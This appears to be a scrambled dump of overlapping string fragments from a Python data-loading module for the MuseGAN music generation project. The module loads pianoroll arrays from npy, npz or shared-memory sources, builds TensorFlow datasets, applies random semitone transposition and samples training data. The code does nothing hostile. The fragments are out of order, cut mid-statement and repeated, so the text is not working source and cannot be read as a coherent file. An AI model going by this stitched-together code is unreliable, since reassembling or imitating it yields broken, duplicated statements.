1:] pianoroll[:, :semitone,", "array.\"\"\" if labels is None: dataset = tf.data.Dataset.from_generator( lambda: _gen_data(data),", "\" + str(data_source)) # --- Dataset Utilities ------------------------------------------------------- def random_transpose(pianoroll):", "tf.py_func(random_transpose, [pianoroll], tf.float32), label), num_parallel_calls=num_threads) dataset = dataset.map( lambda pianoroll,", "as tf from musegan.config import SHUFFLE_BUFFER_SIZE, PREFETCH_SIZE LOGGER = logging.getLogger(__name__)", "dataset from an array.\"\"\" if labels is None: dataset =", "tf.int32]) if use_random_transpose: dataset = dataset.map( lambda pianoroll, label: (", "tf.float32), label), num_parallel_calls=num_threads) dataset = dataset.map( lambda pianoroll, label: (set_pianoroll_shape(", "be one of 'sa', 'npy', 'npz'. \" \"But get \"", "file (sparse format).\"\"\" with np.load(filename) as f: data = np.zeros(f['shape'],", "np.bool_): yield item * 2. - 1. else: yield item", "as f: data = np.zeros(f['shape'], np.bool_) data[[x for x in", "labels[indices] # --- Tensorflow Dataset ------------------------------------------------------- def _gen_data(data, labels=None): \"\"\"Data", "and preprocessing pianoroll data. \"\"\" import logging import numpy as", "lambda pianoroll, label: (set_pianoroll_shape( pianoroll, data_shape), set_label_shape(label)), num_parallel_calls=num_threads) dataset =", "PREFETCH_SIZE LOGGER = logging.getLogger(__name__) # --- Data loader -------------------------------------------------------------- def", "= np.random.randint(-5, 6) if semitone > 0: pianoroll[:, semitone:, 1:]", "= np.random.choice(len(data), n_samples, False) if np.issubdtype(data.dtype, np.bool_): sample_data = data[indices]", "in data: if np.issubdtype(data.dtype, np.bool_): yield item * 2. -", "data def load_data(data_source, data_filename): \"\"\"Load and return the training data.\"\"\"", "pianoroll shape and return the pianoroll.\"\"\" pianoroll.set_shape(data_shape) return pianoroll def", "- 1. else: sample_data = data[indices] if use_random_transpose: sample_data =", "npz file (sparse format).\"\"\" with np.load(filename) as f: data =", "batch_size=None, data_shape=None, use_random_transpose=False, num_threads=1): \"\"\"Create and return a tensorflow dataset", "use_random_transpose: dataset = dataset.map( lambda pianoroll, label: ( tf.py_func(random_transpose, [pianoroll],", "_gen_data(data), tf.float32) if use_random_transpose: dataset = dataset.map( lambda pianoroll: tf.py_func(", "> 0: pianoroll[:, semitone:, 1:] = pianoroll[:, :-semitone, 1:] pianoroll[:,", "labels is None: for item in data: if np.issubdtype(data.dtype, np.bool_):", "get_samples(n_samples, data, labels=None, use_random_transpose=False): \"\"\"Return some random samples of the", "set_pianoroll_shape( pianoroll, data_shape), num_parallel_calls=num_threads) else: assert len(data) == len(labels), (", "def set_label_shape(label): \"\"\"Set the label shape and return the label.\"\"\"", "if data_source == 'sa': import SharedArray as sa return sa.attach(data_filename)", "Tensorflow Dataset ------------------------------------------------------- def _gen_data(data, labels=None): \"\"\"Data Generator.\"\"\" if labels", "def load_data_from_npz(filename): \"\"\"Load and return the training data from a", "data_source == 'sa': import SharedArray as sa return sa.attach(data_filename) if", "None: return sample_data return sample_data, labels[indices] # --- Tensorflow Dataset", "semitone:, 1:] = pianoroll[:, :-semitone, 1:] pianoroll[:, :semitone, 1:] =", "1:] = 0 return pianoroll def set_pianoroll_shape(pianoroll, data_shape): \"\"\"Set the", "elif semitone < 0: pianoroll[:, :semitone, 1:] = pianoroll[:, -semitone:,", "label), num_parallel_calls=num_threads) dataset = dataset.map( lambda pianoroll, label: (set_pianoroll_shape( pianoroll,", "training data.\"\"\" indices = np.random.choice(len(data), n_samples, False) if np.issubdtype(data.dtype, np.bool_):", "== len(labels), ( \"Lengths of `data` and `lables` do not", "* 2. - 1. else: yield item else: for i,", "npy file.\"\"\" return np.load(filename) def load_data_from_npz(filename): \"\"\"Load and return the", "a npy file.\"\"\" return np.load(filename) def load_data_from_npz(filename): \"\"\"Load and return", "_gen_data(data, labels=None): \"\"\"Data Generator.\"\"\" if labels is None: for item", "= tf.data.Dataset.from_generator( lambda: _gen_data(data, labels), [tf.float32, tf.int32]) if use_random_transpose: dataset", "True return data def load_data(data_source, data_filename): \"\"\"Load and return the", "num_parallel_calls=num_threads) else: assert len(data) == len(labels), ( \"Lengths of `data`", "label.set_shape([1]) return label # --- Sampler ------------------------------------------------------------------ def get_samples(n_samples, data,", "1:] pianoroll[:, :semitone, 1:] = 0 elif semitone < 0:", "for loading and preprocessing pianoroll data. \"\"\" import logging import", "and return the training data from a npz file (sparse", "transpose a pianoroll with [-5, 6] semitones.\"\"\" semitone = np.random.randint(-5,", "data_shape): \"\"\"Set the pianoroll shape and return the pianoroll.\"\"\" pianoroll.set_shape(data_shape)", "yield (item, labels[i]) def get_dataset(data, labels=None, batch_size=None, data_shape=None, use_random_transpose=False, num_threads=1):", "for i, item in enumerate(data): if np.issubdtype(data.dtype, np.bool_): yield (item", "np.array([random_transpose(x) for x in sample_data]) if labels is None: return", "* 2. - 1. else: sample_data = data[indices] if use_random_transpose:", "from musegan.config import SHUFFLE_BUFFER_SIZE, PREFETCH_SIZE LOGGER = logging.getLogger(__name__) # ---", "1:] pianoroll[:, semitone:, 1:] = 0 return pianoroll def set_pianoroll_shape(pianoroll,", "and return a tensorflow dataset from an array.\"\"\" if labels", ":semitone, 1:] = 0 elif semitone < 0: pianoroll[:, :semitone,", "from a npy file.\"\"\" return np.load(filename) def load_data_from_npz(filename): \"\"\"Load and", "contains functions for loading and preprocessing pianoroll data. \"\"\" import", "semitone = np.random.randint(-5, 6) if semitone > 0: pianoroll[:, semitone:,", "a npz file (sparse format).\"\"\" with np.load(filename) as f: data", "if use_random_transpose: sample_data = np.array([random_transpose(x) for x in sample_data]) if", "1., labels[i]) else: yield (item, labels[i]) def get_dataset(data, labels=None, batch_size=None,", "training data.\"\"\" if data_source == 'sa': import SharedArray as sa", "if use_random_transpose: dataset = dataset.map( lambda pianoroll: tf.py_func( random_transpose, [pianoroll],", "1. else: sample_data = data[indices] if use_random_transpose: sample_data = np.array([random_transpose(x)", "num_parallel_calls=num_threads) dataset = dataset.map( lambda pianoroll, label: (set_pianoroll_shape( pianoroll, data_shape),", "data_source == 'npz': return load_data_from_npz(data_filename) raise ValueError(\"Expect `data_source` to be", "some random samples of the training data.\"\"\" indices = np.random.choice(len(data),", "return the training data.\"\"\" if data_source == 'sa': import SharedArray", "use_random_transpose=False, num_threads=1): \"\"\"Create and return a tensorflow dataset from an", "and return the pianoroll.\"\"\" pianoroll.set_shape(data_shape) return pianoroll def set_label_shape(label): \"\"\"Set", "tf.float32) if use_random_transpose: dataset = dataset.map( lambda pianoroll: tf.py_func( random_transpose,", "LOGGER = logging.getLogger(__name__) # --- Data loader -------------------------------------------------------------- def load_data_from_npy(filename):", "dataset = dataset.map( lambda pianoroll, label: ( tf.py_func(random_transpose, [pianoroll], tf.float32),", "labels[i]) def get_dataset(data, labels=None, batch_size=None, data_shape=None, use_random_transpose=False, num_threads=1): \"\"\"Create and", "lambda: _gen_data(data), tf.float32) if use_random_transpose: dataset = dataset.map( lambda pianoroll:", "pianoroll: tf.py_func( random_transpose, [pianoroll], tf.float32), num_parallel_calls=num_threads) dataset = dataset.map(lambda pianoroll:", "None: for item in data: if np.issubdtype(data.dtype, np.bool_): yield item", "do not match.\") dataset = tf.data.Dataset.from_generator( lambda: _gen_data(data, labels), [tf.float32,", "SHUFFLE_BUFFER_SIZE, PREFETCH_SIZE LOGGER = logging.getLogger(__name__) # --- Data loader --------------------------------------------------------------", "functions for loading and preprocessing pianoroll data. \"\"\" import logging", "numpy as np import tensorflow.compat.v1 as tf from musegan.config import", "x in f['nonzero']]] = True return data def load_data(data_source, data_filename):", "\"But get \" + str(data_source)) # --- Dataset Utilities -------------------------------------------------------", "yield (item * 2. - 1., labels[i]) else: yield (item,", "loader -------------------------------------------------------------- def load_data_from_npy(filename): \"\"\"Load and return the training data", "\"\"\"Set the label shape and return the label.\"\"\" label.set_shape([1]) return", "def get_samples(n_samples, data, labels=None, use_random_transpose=False): \"\"\"Return some random samples of", "lambda pianoroll, label: ( tf.py_func(random_transpose, [pianoroll], tf.float32), label), num_parallel_calls=num_threads) dataset", "\"\"\"Return some random samples of the training data.\"\"\" indices =", "if np.issubdtype(data.dtype, np.bool_): sample_data = data[indices] * 2. - 1.", "of `data` and `lables` do not match.\") dataset = tf.data.Dataset.from_generator(", "load_data(data_source, data_filename): \"\"\"Load and return the training data.\"\"\" if data_source", "semitone > 0: pianoroll[:, semitone:, 1:] = pianoroll[:, :-semitone, 1:]", "1:] = pianoroll[:, :-semitone, 1:] pianoroll[:, :semitone, 1:] = 0", "labels is None: return sample_data return sample_data, labels[indices] # ---", "\"Lengths of `data` and `lables` do not match.\") dataset =", "i, item in enumerate(data): if np.issubdtype(data.dtype, np.bool_): yield (item *", "item else: for i, item in enumerate(data): if np.issubdtype(data.dtype, np.bool_):", "import SharedArray as sa return sa.attach(data_filename) if data_source == 'npy':", "sa return sa.attach(data_filename) if data_source == 'npy': return load_data_from_npy(data_filename) if", "tf.data.Dataset.from_generator( lambda: _gen_data(data), tf.float32) if use_random_transpose: dataset = dataset.map( lambda", "pianoroll data. \"\"\" import logging import numpy as np import", "sa.attach(data_filename) if data_source == 'npy': return load_data_from_npy(data_filename) if data_source ==", "tf.float32), num_parallel_calls=num_threads) dataset = dataset.map(lambda pianoroll: set_pianoroll_shape( pianoroll, data_shape), num_parallel_calls=num_threads)", "\"\"\" import logging import numpy as np import tensorflow.compat.v1 as", "to be one of 'sa', 'npy', 'npz'. \" \"But get", "- 1., labels[i]) else: yield (item, labels[i]) def get_dataset(data, labels=None,", "indices = np.random.choice(len(data), n_samples, False) if np.issubdtype(data.dtype, np.bool_): sample_data =", "pianoroll, label: ( tf.py_func(random_transpose, [pianoroll], tf.float32), label), num_parallel_calls=num_threads) dataset =", "match.\") dataset = tf.data.Dataset.from_generator( lambda: _gen_data(data, labels), [tf.float32, tf.int32]) if", "logging.getLogger(__name__) # --- Data loader -------------------------------------------------------------- def load_data_from_npy(filename): \"\"\"Load and", "in f['nonzero']]] = True return data def load_data(data_source, data_filename): \"\"\"Load", "else: assert len(data) == len(labels), ( \"Lengths of `data` and", "musegan.config import SHUFFLE_BUFFER_SIZE, PREFETCH_SIZE LOGGER = logging.getLogger(__name__) # --- Data", "pianoroll[:, -semitone:, 1:] pianoroll[:, semitone:, 1:] = 0 return pianoroll", "import SHUFFLE_BUFFER_SIZE, PREFETCH_SIZE LOGGER = logging.getLogger(__name__) # --- Data loader", "return a tensorflow dataset from an array.\"\"\" if labels is", "item * 2. - 1. else: yield item else: for", "for x in sample_data]) if labels is None: return sample_data", "data, labels=None, use_random_transpose=False): \"\"\"Return some random samples of the training", "False) if np.issubdtype(data.dtype, np.bool_): sample_data = data[indices] * 2. -", "pianoroll: set_pianoroll_shape( pianoroll, data_shape), num_parallel_calls=num_threads) else: assert len(data) == len(labels),", "return label # --- Sampler ------------------------------------------------------------------ def get_samples(n_samples, data, labels=None,", "labels=None, use_random_transpose=False): \"\"\"Return some random samples of the training data.\"\"\"", "as sa return sa.attach(data_filename) if data_source == 'npy': return load_data_from_npy(data_filename)", "label: (set_pianoroll_shape( pianoroll, data_shape), set_label_shape(label)), num_parallel_calls=num_threads) dataset = dataset.shuffle(SHUFFLE_BUFFER_SIZE).repeat().batch(batch_size) return", "pianoroll[:, :semitone, 1:] = 0 elif semitone < 0: pianoroll[:,", "return pianoroll def set_label_shape(label): \"\"\"Set the label shape and return", ":semitone, 1:] = pianoroll[:, -semitone:, 1:] pianoroll[:, semitone:, 1:] =", "None: dataset = tf.data.Dataset.from_generator( lambda: _gen_data(data), tf.float32) if use_random_transpose: dataset", "def _gen_data(data, labels=None): \"\"\"Data Generator.\"\"\" if labels is None: for", "pianoroll[:, :semitone, 1:] = pianoroll[:, -semitone:, 1:] pianoroll[:, semitone:, 1:]", "return the label.\"\"\" label.set_shape([1]) return label # --- Sampler ------------------------------------------------------------------", "6) if semitone > 0: pianoroll[:, semitone:, 1:] = pianoroll[:,", "[pianoroll], tf.float32), label), num_parallel_calls=num_threads) dataset = dataset.map( lambda pianoroll, label:", "Generator.\"\"\" if labels is None: for item in data: if", "--- Data loader -------------------------------------------------------------- def load_data_from_npy(filename): \"\"\"Load and return the", "'sa': import SharedArray as sa return sa.attach(data_filename) if data_source ==", "logging import numpy as np import tensorflow.compat.v1 as tf from", "len(labels), ( \"Lengths of `data` and `lables` do not match.\")", "sample_data = data[indices] * 2. - 1. else: sample_data =", "x in sample_data]) if labels is None: return sample_data return", "1:] = pianoroll[:, -semitone:, 1:] pianoroll[:, semitone:, 1:] = 0", "(item, labels[i]) def get_dataset(data, labels=None, batch_size=None, data_shape=None, use_random_transpose=False, num_threads=1): \"\"\"Create", "tensorflow dataset from an array.\"\"\" if labels is None: dataset", "pianoroll.set_shape(data_shape) return pianoroll def set_label_shape(label): \"\"\"Set the label shape and", "label # --- Sampler ------------------------------------------------------------------ def get_samples(n_samples, data, labels=None, use_random_transpose=False):", "= dataset.map( lambda pianoroll, label: (set_pianoroll_shape( pianoroll, data_shape), set_label_shape(label)), num_parallel_calls=num_threads)", "with np.load(filename) as f: data = np.zeros(f['shape'], np.bool_) data[[x for", "str(data_source)) # --- Dataset Utilities ------------------------------------------------------- def random_transpose(pianoroll): \"\"\"Randomly transpose", "if use_random_transpose: dataset = dataset.map( lambda pianoroll, label: ( tf.py_func(random_transpose,", "dataset = dataset.map( lambda pianoroll: tf.py_func( random_transpose, [pianoroll], tf.float32), num_parallel_calls=num_threads)", "# --- Tensorflow Dataset ------------------------------------------------------- def _gen_data(data, labels=None): \"\"\"Data Generator.\"\"\"", "if data_source == 'npy': return load_data_from_npy(data_filename) if data_source == 'npz':", "file contains functions for loading and preprocessing pianoroll data. \"\"\"", "np.random.randint(-5, 6) if semitone > 0: pianoroll[:, semitone:, 1:] =", "sample_data return sample_data, labels[indices] # --- Tensorflow Dataset ------------------------------------------------------- def", "pianoroll with [-5, 6] semitones.\"\"\" semitone = np.random.randint(-5, 6) if", "labels[i]) else: yield (item, labels[i]) def get_dataset(data, labels=None, batch_size=None, data_shape=None,", "pianoroll, label: (set_pianoroll_shape( pianoroll, data_shape), set_label_shape(label)), num_parallel_calls=num_threads) dataset = dataset.shuffle(SHUFFLE_BUFFER_SIZE).repeat().batch(batch_size)", "load_data_from_npz(filename): \"\"\"Load and return the training data from a npz", "= tf.data.Dataset.from_generator( lambda: _gen_data(data), tf.float32) if use_random_transpose: dataset = dataset.map(", "Utilities ------------------------------------------------------- def random_transpose(pianoroll): \"\"\"Randomly transpose a pianoroll with [-5,", "random samples of the training data.\"\"\" indices = np.random.choice(len(data), n_samples,", "semitone:, 1:] = 0 return pianoroll def set_pianoroll_shape(pianoroll, data_shape): \"\"\"Set", "- 1. else: yield item else: for i, item in", "* 2. - 1., labels[i]) else: yield (item, labels[i]) def", "= data[indices] * 2. - 1. else: sample_data = data[indices]", "training data from a npz file (sparse format).\"\"\" with np.load(filename)", "use_random_transpose: dataset = dataset.map( lambda pianoroll: tf.py_func( random_transpose, [pianoroll], tf.float32),", "return the pianoroll.\"\"\" pianoroll.set_shape(data_shape) return pianoroll def set_label_shape(label): \"\"\"Set the", "labels), [tf.float32, tf.int32]) if use_random_transpose: dataset = dataset.map( lambda pianoroll,", "data_filename): \"\"\"Load and return the training data.\"\"\" if data_source ==", ":-semitone, 1:] pianoroll[:, :semitone, 1:] = 0 elif semitone <", "else: sample_data = data[indices] if use_random_transpose: sample_data = np.array([random_transpose(x) for", "sample_data = np.array([random_transpose(x) for x in sample_data]) if labels is", "labels=None): \"\"\"Data Generator.\"\"\" if labels is None: for item in", "= pianoroll[:, -semitone:, 1:] pianoroll[:, semitone:, 1:] = 0 return", "# --- Dataset Utilities ------------------------------------------------------- def random_transpose(pianoroll): \"\"\"Randomly transpose a", "else: for i, item in enumerate(data): if np.issubdtype(data.dtype, np.bool_): yield", "the label.\"\"\" label.set_shape([1]) return label # --- Sampler ------------------------------------------------------------------ def", "dataset = dataset.map( lambda pianoroll, label: (set_pianoroll_shape( pianoroll, data_shape), set_label_shape(label)),", "= np.zeros(f['shape'], np.bool_) data[[x for x in f['nonzero']]] = True", "tf from musegan.config import SHUFFLE_BUFFER_SIZE, PREFETCH_SIZE LOGGER = logging.getLogger(__name__) #", "def get_dataset(data, labels=None, batch_size=None, data_shape=None, use_random_transpose=False, num_threads=1): \"\"\"Create and return", "the pianoroll shape and return the pianoroll.\"\"\" pianoroll.set_shape(data_shape) return pianoroll", "get_dataset(data, labels=None, batch_size=None, data_shape=None, use_random_transpose=False, num_threads=1): \"\"\"Create and return a", "-------------------------------------------------------------- def load_data_from_npy(filename): \"\"\"Load and return the training data from", "from an array.\"\"\" if labels is None: dataset = tf.data.Dataset.from_generator(", "2. - 1. else: yield item else: for i, item", "get \" + str(data_source)) # --- Dataset Utilities ------------------------------------------------------- def", "np.zeros(f['shape'], np.bool_) data[[x for x in f['nonzero']]] = True return", "np.bool_): yield (item * 2. - 1., labels[i]) else: yield", "pianoroll[:, semitone:, 1:] = 0 return pianoroll def set_pianoroll_shape(pianoroll, data_shape):", "the training data.\"\"\" if data_source == 'sa': import SharedArray as", "\"\"\"Randomly transpose a pianoroll with [-5, 6] semitones.\"\"\" semitone =", "pianoroll[:, semitone:, 1:] = pianoroll[:, :-semitone, 1:] pianoroll[:, :semitone, 1:]", "set_pianoroll_shape(pianoroll, data_shape): \"\"\"Set the pianoroll shape and return the pianoroll.\"\"\"", "np.issubdtype(data.dtype, np.bool_): yield (item * 2. - 1., labels[i]) else:", "else: yield item else: for i, item in enumerate(data): if", "f: data = np.zeros(f['shape'], np.bool_) data[[x for x in f['nonzero']]]", "\"\"\"This file contains functions for loading and preprocessing pianoroll data.", "import numpy as np import tensorflow.compat.v1 as tf from musegan.config", "2. - 1., labels[i]) else: yield (item, labels[i]) def get_dataset(data,", "label.\"\"\" label.set_shape([1]) return label # --- Sampler ------------------------------------------------------------------ def get_samples(n_samples,", "random_transpose(pianoroll): \"\"\"Randomly transpose a pianoroll with [-5, 6] semitones.\"\"\" semitone", "dataset.map(lambda pianoroll: set_pianoroll_shape( pianoroll, data_shape), num_parallel_calls=num_threads) else: assert len(data) ==", "\"\"\"Set the pianoroll shape and return the pianoroll.\"\"\" pianoroll.set_shape(data_shape) return", "\"\"\"Load and return the training data from a npy file.\"\"\"", "--- Dataset Utilities ------------------------------------------------------- def random_transpose(pianoroll): \"\"\"Randomly transpose a pianoroll", "np.issubdtype(data.dtype, np.bool_): yield item * 2. - 1. else: yield", "np import tensorflow.compat.v1 as tf from musegan.config import SHUFFLE_BUFFER_SIZE, PREFETCH_SIZE", "1. else: yield item else: for i, item in enumerate(data):", "return load_data_from_npz(data_filename) raise ValueError(\"Expect `data_source` to be one of 'sa',", "(set_pianoroll_shape( pianoroll, data_shape), set_label_shape(label)), num_parallel_calls=num_threads) dataset = dataset.shuffle(SHUFFLE_BUFFER_SIZE).repeat().batch(batch_size) return dataset.prefetch(PREFETCH_SIZE)", "of the training data.\"\"\" indices = np.random.choice(len(data), n_samples, False) if", "Sampler ------------------------------------------------------------------ def get_samples(n_samples, data, labels=None, use_random_transpose=False): \"\"\"Return some random", "random_transpose, [pianoroll], tf.float32), num_parallel_calls=num_threads) dataset = dataset.map(lambda pianoroll: set_pianoroll_shape( pianoroll,", "data[indices] if use_random_transpose: sample_data = np.array([random_transpose(x) for x in sample_data])", "and return the training data from a npy file.\"\"\" return", "labels=None, batch_size=None, data_shape=None, use_random_transpose=False, num_threads=1): \"\"\"Create and return a tensorflow", "return sample_data return sample_data, labels[indices] # --- Tensorflow Dataset -------------------------------------------------------", "data.\"\"\" indices = np.random.choice(len(data), n_samples, False) if np.issubdtype(data.dtype, np.bool_): sample_data", "(sparse format).\"\"\" with np.load(filename) as f: data = np.zeros(f['shape'], np.bool_)", "return load_data_from_npy(data_filename) if data_source == 'npz': return load_data_from_npz(data_filename) raise ValueError(\"Expect", "dataset.map( lambda pianoroll, label: (set_pianoroll_shape( pianoroll, data_shape), set_label_shape(label)), num_parallel_calls=num_threads) dataset", "if data_source == 'npz': return load_data_from_npz(data_filename) raise ValueError(\"Expect `data_source` to", "\" \"But get \" + str(data_source)) # --- Dataset Utilities", "raise ValueError(\"Expect `data_source` to be one of 'sa', 'npy', 'npz'.", "return the training data from a npy file.\"\"\" return np.load(filename)", "not match.\") dataset = tf.data.Dataset.from_generator( lambda: _gen_data(data, labels), [tf.float32, tf.int32])", "use_random_transpose: sample_data = np.array([random_transpose(x) for x in sample_data]) if labels", "'sa', 'npy', 'npz'. \" \"But get \" + str(data_source)) #", "np.bool_) data[[x for x in f['nonzero']]] = True return data", "pianoroll.\"\"\" pianoroll.set_shape(data_shape) return pianoroll def set_label_shape(label): \"\"\"Set the label shape", "= pianoroll[:, :-semitone, 1:] pianoroll[:, :semitone, 1:] = 0 elif", "# --- Sampler ------------------------------------------------------------------ def get_samples(n_samples, data, labels=None, use_random_transpose=False): \"\"\"Return", "data from a npz file (sparse format).\"\"\" with np.load(filename) as", "( tf.py_func(random_transpose, [pianoroll], tf.float32), label), num_parallel_calls=num_threads) dataset = dataset.map( lambda", "= np.array([random_transpose(x) for x in sample_data]) if labels is None:", "if np.issubdtype(data.dtype, np.bool_): yield item * 2. - 1. else:", "# --- Data loader -------------------------------------------------------------- def load_data_from_npy(filename): \"\"\"Load and return", "(item * 2. - 1., labels[i]) else: yield (item, labels[i])", "def random_transpose(pianoroll): \"\"\"Randomly transpose a pianoroll with [-5, 6] semitones.\"\"\"", "if semitone > 0: pianoroll[:, semitone:, 1:] = pianoroll[:, :-semitone,", "dataset.map( lambda pianoroll: tf.py_func( random_transpose, [pianoroll], tf.float32), num_parallel_calls=num_threads) dataset =", "data from a npy file.\"\"\" return np.load(filename) def load_data_from_npz(filename): \"\"\"Load", "== 'npy': return load_data_from_npy(data_filename) if data_source == 'npz': return load_data_from_npz(data_filename)", "load_data_from_npy(data_filename) if data_source == 'npz': return load_data_from_npz(data_filename) raise ValueError(\"Expect `data_source`", "of 'sa', 'npy', 'npz'. \" \"But get \" + str(data_source))", "load_data_from_npz(data_filename) raise ValueError(\"Expect `data_source` to be one of 'sa', 'npy',", "return the training data from a npz file (sparse format).\"\"\"", "[tf.float32, tf.int32]) if use_random_transpose: dataset = dataset.map( lambda pianoroll, label:", "from a npz file (sparse format).\"\"\" with np.load(filename) as f:", "return data def load_data(data_source, data_filename): \"\"\"Load and return the training", "load_data_from_npy(filename): \"\"\"Load and return the training data from a npy", "pianoroll[:, :-semitone, 1:] pianoroll[:, :semitone, 1:] = 0 elif semitone", "sample_data = data[indices] if use_random_transpose: sample_data = np.array([random_transpose(x) for x", "data.\"\"\" if data_source == 'sa': import SharedArray as sa return", "use_random_transpose=False): \"\"\"Return some random samples of the training data.\"\"\" indices", "--- Tensorflow Dataset ------------------------------------------------------- def _gen_data(data, labels=None): \"\"\"Data Generator.\"\"\" if", "= 0 elif semitone < 0: pianoroll[:, :semitone, 1:] =", "return pianoroll def set_pianoroll_shape(pianoroll, data_shape): \"\"\"Set the pianoroll shape and", "len(data) == len(labels), ( \"Lengths of `data` and `lables` do", "pianoroll def set_label_shape(label): \"\"\"Set the label shape and return the", "Dataset ------------------------------------------------------- def _gen_data(data, labels=None): \"\"\"Data Generator.\"\"\" if labels is", "== 'npz': return load_data_from_npz(data_filename) raise ValueError(\"Expect `data_source` to be one", "import logging import numpy as np import tensorflow.compat.v1 as tf", "_gen_data(data, labels), [tf.float32, tf.int32]) if use_random_transpose: dataset = dataset.map( lambda" ]
[]